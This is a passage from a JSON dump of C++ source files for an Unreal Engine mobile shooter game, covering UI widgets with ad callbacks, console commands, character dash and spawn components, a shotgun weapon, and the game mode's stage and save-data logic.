\"PG_UserWidgetStageFailed.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetStageFailed : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\t\npublic:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoToMainLobby();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n\nprivate:\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n};\n" }, { "alpha_fraction": 0.770652174949646, "alphanum_fraction": 0.770652174949646, "avg_line_length": 23.891891479492188, "blob_id": "945c81e54242056abe27dab5fb0dad9e81e15067", "content_id": "19d9433dd4997ac836a22ce480a3ba7d4a3bcd38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 922, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_Command.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"Game/Console/Commands/PG_Command.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\nPG_Command::PG_Command()\n{\n}\n\nPG_Command::~PG_Command()\n{\n}\n\nvoid PG_Command::Init(IConsoleVariable* pConsoleVariable)\n{\n\tABCHECK(nullptr != pConsoleVariable);\n\n\tm_pConsoleVariable = pConsoleVariable;\n\tm_pConsoleVariable->AsVariable()->SetOnChangedCallback(FConsoleVariableDelegate::CreateStatic(&OnUpdateConsoleValue));\n}\n\nvoid PG_Command::OnUpdateConsoleValue(IConsoleVariable* pConsoleVariable)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pConsole = pGameInstance->GetConsole();\n\tABCHECK(nullptr != pConsole);\n\n\tauto pCommand = pConsole->GetCommand(pConsoleVariable);\n\tABCHECK(nullptr != pCommand);\n\n\tpCommand->OnChangeCommand();\n}" }, { "alpha_fraction": 0.7345132827758789, "alphanum_fraction": 0.7362831830978394, "avg_line_length": 23.042552947998047, "blob_id": "4f76ba7b9d44b5a61bba13c9f0d42ba6f35101b4", "content_id": "78f103d812d630a44b9445f6605a94d64e11c9a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2360, "license_type": "no_license", "max_line_length": 122, "num_lines": 94, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentDash.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project 
Settings.\n\n#include \"Character/Component/PG_ComponentDash.h\"\n#include \"Character/PG_Char.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentDash::UPG_ComponentDash()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = true;\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentDash::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\t// ...\n\t\n}\n\n\n// Called every frame\nvoid UPG_ComponentDash::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n\n\tUpdateDashLocation(DeltaTime);\n}\n\nbool UPG_ComponentDash::SetupDashData(FVector vDashTargetPos, float fMoveDistance, float fDashSpeed)\n{\n\tauto AOwner = Cast<APG_Char>(GetOwner());\n\tABCHECK(nullptr != AOwner, false);\n\tABCHECK(false == vDashTargetPos.IsZero(), false);\n\n\tm_fDashSpeed = fDashSpeed;\n\t// 대쉬 방향 계산\n\tm_vDashDir = vDashTargetPos - AOwner->GetActorLocation();\n\tm_vDashDir.Normalize();\n\n\tm_vGoalPos = AOwner->GetActorLocation() + (m_vDashDir * fMoveDistance);\n\n\t// 타겟 방향으로 몬스터 회전\n\tAOwner->SetActorRotation(m_vDashDir.Rotation());\n\n\treturn true;\n}\n\nvoid UPG_ComponentDash::StartDash()\n{\n\tm_bActiveDash = true;\n}\n\nvoid UPG_ComponentDash::StopDash()\n{\n\tm_bActiveDash = false;\n\tm_fDashSpeed = 0.0f;\n\tm_vDashDir = FVector::ZeroVector;\n\tm_vGoalPos = FVector::ZeroVector;\t// 최종 이동 목표지점\n\tOnDashEnd.Broadcast();\n}\n\nbool UPG_ComponentDash::IsDash()\n{\n\treturn m_bActiveDash;\n}\n\nvoid UPG_ComponentDash::UpdateDashLocation(float fDeltaTime)\n{\n\tif (false == m_bActiveDash)\n\t\treturn;\n\n\tauto AOwner = Cast<APG_Char>(GetOwner());\n\tif (nullptr == AOwner)\n\t{\n\t\tm_bActiveDash = false;\n\t\tABCHECK(nullptr != AOwner);\n\t}\n\n\tFVector vLocation = AOwner->GetActorLocation();\n\tFVector vPos = FMath::VInterpTo(vLocation, m_vGoalPos, fDeltaTime, m_fDashSpeed);\n\t// 어느정도 목표지점에 들어오면 대쉬가 끝났다는걸 알린다.\n\tif (10 >= FMath::Abs<float>(FVector::Distance(vLocation, m_vGoalPos)))\n\t{\n\t\tOnDashEnd.Broadcast();\n\t\treturn;\n\t}\n\n\tAOwner->SetActorLocation(vPos);\n\tAOwner->AddMovementInput(m_vDashDir);\n}\n" }, { "alpha_fraction": 0.7692692875862122, "alphanum_fraction": 0.7702702879905701, "avg_line_length": 29.75384521484375, "blob_id": "5ffd0de935271864a89620cd6c8c5c52327c46b2", "content_id": "63492df839da29363d590e3389cc824d534e46b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2038, "license_type": "no_license", "max_line_length": 195, "num_lines": 65, "path": "/Source/Project_Gun/Private/BlueScriptObject/Target/PG_TargetSpot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Target/PG_TargetSpot.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n\n// Sets default values\nAPG_TargetSpot::APG_TargetSpot()\n{\n \t// Set this actor to call Tick() every frame. 
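// --- Illustrative sketch, not taken from the original Project_Gun sources -------------------
// Minimal standalone version of the dash update in UPG_ComponentDash above: each tick the
// position is eased toward a fixed goal point (goal = start + normalized direction * dash
// distance) and the dash ends once the remaining distance drops under a small threshold,
// mirroring the 10-unit check in UpdateDashLocation. Plain standard C++; DashState and
// TickDash are hypothetical names, the easing is a simplified version of what
// FMath::VInterpTo does, and actor rotation / AddMovementInput are omitted.
#include <algorithm>
#include <cmath>

struct V3 { float X, Y, Z; };

struct DashState
{
    V3    Position;        // current actor location
    V3    Goal;            // start + normalized dash direction * dash distance
    float Speed;           // interpolation speed (same role as m_fDashSpeed)
    bool  bActive = true;
};

// Returns true while the dash is still running.
inline bool TickDash(DashState& S, float DeltaTime, float StopThreshold = 10.0f)
{
    if (!S.bActive) return false;

    const V3 ToGoal { S.Goal.X - S.Position.X, S.Goal.Y - S.Position.Y, S.Goal.Z - S.Position.Z };
    const float Dist = std::sqrt(ToGoal.X * ToGoal.X + ToGoal.Y * ToGoal.Y + ToGoal.Z * ToGoal.Z);
    if (Dist <= StopThreshold)              // close enough: finish (OnDashEnd in the original)
    {
        S.bActive = false;
        return false;
    }

    // Move a DeltaTime * Speed fraction of the remaining offset, clamped so a single
    // tick never overshoots the goal.
    const float Alpha = std::clamp(DeltaTime * S.Speed, 0.0f, 1.0f);
    S.Position = { S.Position.X + ToGoal.X * Alpha,
                   S.Position.Y + ToGoal.Y * Alpha,
                   S.Position.Z + ToGoal.Z * Alpha };
    return true;
}
// --- End of illustrative sketch --------------------------------------------------------------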
You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\tTrigger = CreateDefaultSubobject<UBoxComponent>(TEXT(\"TRIGGER\"));\n\tBox = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"BOX\"));\n\tPortalEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"PORTALEFFECT\"));\n\n\tRootComponent = Trigger;\n\tBox->SetupAttachment(RootComponent);\n\n\t// 콜리전 설정\n\tTrigger->SetCollisionProfileName(TEXT(\"TargetSpot\"));\n\tTrigger->OnComponentBeginOverlap.AddDynamic(this, &APG_TargetSpot::OnPlayerOverlap);\n\n\tBox->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\t// 파티클 설정\n\tPortalEffect->SetupAttachment(RootComponent);\n\tPortalEffect->bAutoActivate = true;\n}\n\n// Called when the game starts or when spawned\nvoid APG_TargetSpot::BeginPlay()\n{\n\tSuper::BeginPlay();\n\t\n\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t\tAGameStateStage->GateOpenDelegate.AddUObject(this, &APG_TargetSpot::OnGateOpen);\n}\nvoid APG_TargetSpot::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\n// Called every frame\nvoid APG_TargetSpot::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n}\n\nvoid APG_TargetSpot::OnPlayerOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult)\n{\n\tABLOG_S(Warning);\n\n\t// 스테이지 클리어 검사\n\tauto AMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (AMyCharacter && GetWorld())\n\t{\n\t\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\t\tif (AGameStateStage)\n\t\t{\n\t\t\tAGameStateStage->OnCheckStageClear();\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.6567834615707397, "avg_line_length": 32.727272033691406, "blob_id": "e54a19c67ee1b8d5a4a6145779c25a00da1efc1c", "content_id": "44797ba1fe6461ae9520f39b87a28f56aad773be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2536, "license_type": "no_license", "max_line_length": 122, "num_lines": 66, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentDivisionSpawn.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentDivisionSpawn.generated.h\"\n\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentDivisionSpawn : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's properties\n\tUPG_ComponentDivisionSpawn();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\n\t//=================================================================================================\n\t// DivisionSpawnActor : Owner 액터 기준 주위로 원형 모양으로 nDvisionCount만큼 동일한 액터를 Spawn 시킨다.\n\t// nDvisionCount : 생성할 액터 수\n\t// vRange : Spawn될 액터는 Owner의 중점으로부터 vRange 만큼 떨어져서 배치된다. 
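// --- Illustrative sketch, not taken from the original Project_Gun sources -------------------
// Standalone version of the placement math described above and implemented by the
// DivisionSpawnActor template that follows: N spawn points are laid out on a circle around
// the owner by rotating a radius vector about the up (Z) axis in steps of 360/N degrees.
// Plain standard C++; CirclePoints is a hypothetical helper name, the radius is treated as
// a scalar, and the first point is taken along +X rather than the owner's forward vector.
#include <cmath>
#include <vector>

struct P3 { float X, Y, Z; };

inline std::vector<P3> CirclePoints(const P3& Center, float Radius, int Count)
{
    std::vector<P3> Points;
    if (Count <= 0) return Points;

    const float StepDeg  = 360.0f / static_cast<float>(Count);   // same role as fDivDgree
    const float DegToRad = 3.14159265358979f / 180.0f;
    for (int n = 1; n <= Count; ++n)                              // n = 1..Count, as in the original loop
    {
        const float A = StepDeg * n * DegToRad;                   // rotation about the Z (up) axis
        Points.push_back({ Center.X + Radius * std::cos(A),
                           Center.Y + Radius * std::sin(A),
                           Center.Z });
    }
    return Points;
}
// e.g. Count = 4 yields points at 90, 180, 270 and 360 degrees around the owner.
// --- End of illustrative sketch --------------------------------------------------------------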
(=반지름 값)\n\t//=================================================================================================\n\ttemplate<class T>\n\tbool DivisionSpawnActor(int32 nDvisionCount, FVector vRange)\n\t{\n\t\tABCHECK(0 < nDvisionCount, false);\n\n\t\tUWorld* World = GetWorld();\n\t\tABCHECK(nullptr != World, false);\n\n\t\tauto Owner = Cast<T>(GetOwner());\n\t\tABCHECK(nullptr != Owner, false);\n\n\t\tfloat fDivDgree = 360.0f / (float)nDvisionCount;\n\t\tFVector vRadius = Owner->GetActorForwardVector() * vRange;\t\t// 액터 스폰 범위값\n\t\tFVector vLocation = Owner->GetActorLocation();\n\t\tvLocation.Z += 100.0f;\t// 생성된 액터가 하늘에서 떨어지는 효과를 내기위한 보정값\n\n\t\tfor (int n = 1; n <= nDvisionCount; n++)\n\t\t{\n\t\t\tFVector vSpawnPos = vLocation + vRadius.RotateAngleAxis(fDivDgree * n, FVector::UpVector);\n\t\t\tauto ASpawnActor = World->SpawnActor<T>(Owner->GetClass(), vSpawnPos, Owner->GetActorRotation());\n\t\t\tif (nullptr == ASpawnActor)\n\t\t\t{\n\t\t\t\t// 콜리전으로 인해 생성되지 못한 액터는 Owner 머리 위로 스폰할 수 있게 한다.\n\t\t\t\t// 추후에 물리엔진을 이용해서 머리 위로 스폰되면 미끄러지면서 퍼지는 물리를 찾아봐야 할 것 같다.\n\t\t\t\tvLocation.Z += 300.0f;\n\t\t\t\tASpawnActor = World->SpawnActor<T>(Owner->GetClass(), vLocation, Owner->GetActorRotation());\n\t\t\t}\n\t\t\t//ABCHECK(nullptr != ASpawnActor, false);\n\t\t\tOwner->OnSpawnActor(ASpawnActor);\n\t\t}\n\n\t\treturn true;\n\t}\n};\n" }, { "alpha_fraction": 0.7631774544715881, "alphanum_fraction": 0.764290988445282, "avg_line_length": 29.280899047851562, "blob_id": "75708999e3bdc396eecf56831581f602d017633c", "content_id": "a2262f8b1892589b5f147bd8ac86ff9756283870", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2770, "license_type": "no_license", "max_line_length": 124, "num_lines": 89, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponShotgun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponShotgun.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileShutgun.h\"\n#include \"Character/PG_MonChar.h\"\n\n\nAPG_WeaponShotgun::APG_WeaponShotgun()\n{\n\n}\n\nvoid APG_WeaponShotgun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t\tFiringEffect->bAutoActivate = false;\n\t}\n}\n\nvoid APG_WeaponShotgun::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\nvoid APG_WeaponShotgun::Fire()\n{\n\tfor (int32 nIndex = 0; nIndex < eMax_ShotgunProjectile; ++nIndex)\n\t{\n\t\tFName\t\tSocketFire(*FString::Printf(TEXT(\"Socket_Fire_%d\"), nIndex));\n\t\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\t\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\t\tUWorld* World = GetWorld();\n\t\tif (World)\n\t\t{\n\t\t\tFActorSpawnParameters SpawnParams;\n\t\t\tSpawnParams.Owner = this;\n\t\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\t\tCurrFireShutgun = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\t\tABCHECK(nullptr != CurrFireShutgun);\n\n\t\t\t// 발사 방향을 알아냅니다.\n\t\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t\t// 몬스터가 사용하는 무기 여부\n\t\t\tbool bMonsterWeapon = (nullptr != 
Cast<APG_MonChar>(GetOwner()));\n\n\t\t\tCurrFireShutgun->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\t\t//CurrFireShutgun->AttachToActor(this, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\t\t}\n\t}\n\n\tauto pFiringEffect = NewObject<UParticleSystemComponent>(Weapon, UParticleSystemComponent::StaticClass());\n\tif (pFiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\t\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\t\tpFiringEffect = UGameplayStatics::SpawnEmitterAtLocation(GetWorld(), FiringEffect->Template, vLocation, rRotation, false);\n\t\tpFiringEffect->bAutoActivate = false;\n\t\tpFiringEffect->bAutoDestroy = true;\n\t\tpFiringEffect->Activate(true);\n\t\tpFiringEffect->OnSystemFinished.AddDynamic(this, &APG_WeaponShotgun::OnFiringEffectEndParticle);\n\t}\n\n\tif (FireSound)\n\t\tFireSound->Play();\n}\n\nvoid APG_WeaponShotgun::StopFire()\n{\n\t//if (FiringEffect && FiringEffect->IsActive())\n\t//\tFiringEffect->SetActive(false);\n}\n\nvoid APG_WeaponShotgun::OnFiringEffectEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\t//if (ParticleSystemComponent)\n\t//\tParticleSystemComponent->DestroyComponent();\n}" }, { "alpha_fraction": 0.7448789477348328, "alphanum_fraction": 0.7448789477348328, "avg_line_length": 24.595237731933594, "blob_id": "08c4c47dee2aa9b5e91923faeb879876a0b930a8", "content_id": "d304cc65777819b79bd7612776eb117468e848f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 116, "num_lines": 42, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandSetTargetStageID.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandSetTargetStageID.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nPG_CommandSetTargetStageID::PG_CommandSetTargetStageID()\n{\n}\n\nPG_CommandSetTargetStageID::~PG_CommandSetTargetStageID()\n{\n}\n\nvoid PG_CommandSetTargetStageID::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandSetTargetStageID::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tauto pGameMdoe = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMdoe);\n\n\tif (false == pGameMdoe->SetPlayStageID(m_pConsoleVariable->GetInt()))\n\t{\n\t\tABLOG(Warning, TEXT(\"There is no corresponding stage information. (StageID ; %d)\"), m_pConsoleVariable->GetInt());\n\t}\n\n\tABLOG(Warning, TEXT(\"You have finished setting up for that stage. 
(StageID ; %d)\"), m_pConsoleVariable->GetInt());\n}\n\nvoid PG_CommandSetTargetStageID::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7501587867736816, "alphanum_fraction": 0.7545419931411743, "avg_line_length": 28.046125411987305, "blob_id": "8a3d686d530e2f96df27f07d92a167ccf0312fb7", "content_id": "86be2ecf33cd97865dc117056bdf6392f02b19d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15902, "license_type": "no_license", "max_line_length": 176, "num_lines": 542, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeBase.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\nAPG_GameModeBase::APG_GameModeBase()\n{\n\tm_pSavePlayerData = nullptr;\n\tm_pSelectSaveStageData = nullptr;\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n\n\tPrimaryActorTick.bCanEverTick = true;\n}\n\nvoid APG_GameModeBase::PostLoad()\n{\n\tSuper::PostLoad();\n\n\n}\n\nvoid APG_GameModeBase::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tG_PGWorld = GetWorld();\n\n\t// 플레이어 세이브 데이터 로드\n\t{\n\t\tm_pSavePlayerData = LoadSavePlayerData();\n\t\tABCHECK(nullptr != m_pSavePlayerData);\n\t}\n\n\tm_nPalyStageID = m_pSavePlayerData->m_nLastPlayStageID;\n\tif (0 == m_pSavePlayerData->m_nLastPlayStageID)\n\t\tm_nPalyStageID = 1;\n\n\t// 기본 스테이지 선택하기\n\t{\n\t\tm_pSelectSaveStageData = LoadSaveStageData(m_nPalyStageID);\n\t\tABCHECK(nullptr != m_pSelectSaveStageData);\n\t}\n}\n\nvoid APG_GameModeBase::PostLogin(APlayerController* NewPlayer)\n{\n\tSuper::PostLogin(NewPlayer);\n}\n\nvoid APG_GameModeBase::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_GameModeBase::BeginDestroy()\n{\n\tG_PGWorld = nullptr;\n\tSuper::BeginDestroy();\n}\n\nvoid APG_GameModeBase::Tick(float DeltaTime)\n{\n\tUpdateGameInstance(DeltaTime);\n\tSuper::Tick(DeltaTime);\n}\n\nbool APG_GameModeBase::StartGame()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tABCHECK(pGameInstance->GetTableStageData(m_nPalyStageID), false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\tauto pSavePlayerData = GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData, false);\n\n\tpSavePlayerData->m_nLastPlayStageID = m_nPalyStageID;\n\tSavePlayerData();\n\n\tFString NextStageName = pGameInstance->GetStageName(m_nPalyStageID);\n\t//FString DebugMsg = FString::Printf(TEXT(\"Play Stage : %s\"), *NextStageName);\n\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Red, DebugMsg);\n\n\tUGameplayStatics::OpenLevel(GetWorld(), *NextStageName);\n\n\treturn true;\n}\n\nvoid APG_GameModeBase::StartGame_NextStage()\n{\n\tm_nPalyStageID++;\n\tStartGame();\n}\n\nvoid APG_GameModeBase::RestartGame()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tFString RestartStageName = pGameInstance->GetStageName(m_nPalyStageID);\n\t//FString DebugMsg = FString::Printf(TEXT(\"Stage Restart : 
%s\"), *RestartStageName);\n\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Yellow, DebugMsg);\n\n\tUGameplayStatics::OpenLevel(GetWorld(), *RestartStageName);\n}\n\nbool APG_GameModeBase::SetNextStageID()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tint32 nNextStage = m_nPalyStageID + 1;\n\n\tif (pGameInstance->GetTableStageData(nNextStage))\n\t{\n\t\tint32 nBackupPlayStageID = m_nPalyStageID;\n\t\tm_nPalyStageID = nNextStage;\n\n\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeBase, false);\n\n\t\tif (false == pGameModeBase->SetSelectSaveStageData(m_nPalyStageID))\n\t\t{\n\t\t\tm_nPalyStageID = nBackupPlayStageID;\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_GameModeBase::SetPrevStageID()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tint32 nPrevStage = m_nPalyStageID - 1;\n\n\tif (pGameInstance->GetTableStageData(nPrevStage))\n\t{\n\t\tint32 nBackupPlayStageID = m_nPalyStageID;\n\t\tm_nPalyStageID = nPrevStage;\n\n\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeBase, false);\n\n\t\tif (false == pGameModeBase->SetSelectSaveStageData(m_nPalyStageID))\n\t\t{\n\t\t\tm_nPalyStageID = nBackupPlayStageID;\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_GameModeBase::SetPlayStageID(int32 nPlayStageID)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\tABCHECK(pGameInstance->GetTableStageData(nPlayStageID), false);\n\n\tm_nPalyStageID = nPlayStageID;\n\treturn true;\n}\n\nbool APG_GameModeBase::SetSelectSaveStageData(int32 a_nStageID)\n{\n\tm_pSelectSaveStageData = LoadSaveStageData(a_nStageID);\n\treturn (nullptr != m_pSelectSaveStageData);\n}\n\nbool APG_GameModeBase::IsFirstPlayStage(int32 a_nStageID)\n{\n\tauto pSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::LoadGameFromSlot(UPG_SaveStageData::GetSlotName(a_nStageID), UPG_SaveStageData::GetPlayerIndex()));\n\treturn (nullptr == pSaveStageData);\n}\n\nbool APG_GameModeBase::IsUnlockWeapon(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\treturn WeaponOwnData->IsUnlock;\n}\n\nbool APG_GameModeBase::IsMaxLevelPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// Max Level 체크\n\tint32 nPower = m_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].PowerLevel * pWeaponTableData->WeaponData.PowerUpPerLevelUp;\n\treturn (nPower >= pWeaponTableData->WeaponData.MaxPower);\n}\n\nbool APG_GameModeBase::IsMaxLevelAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn 
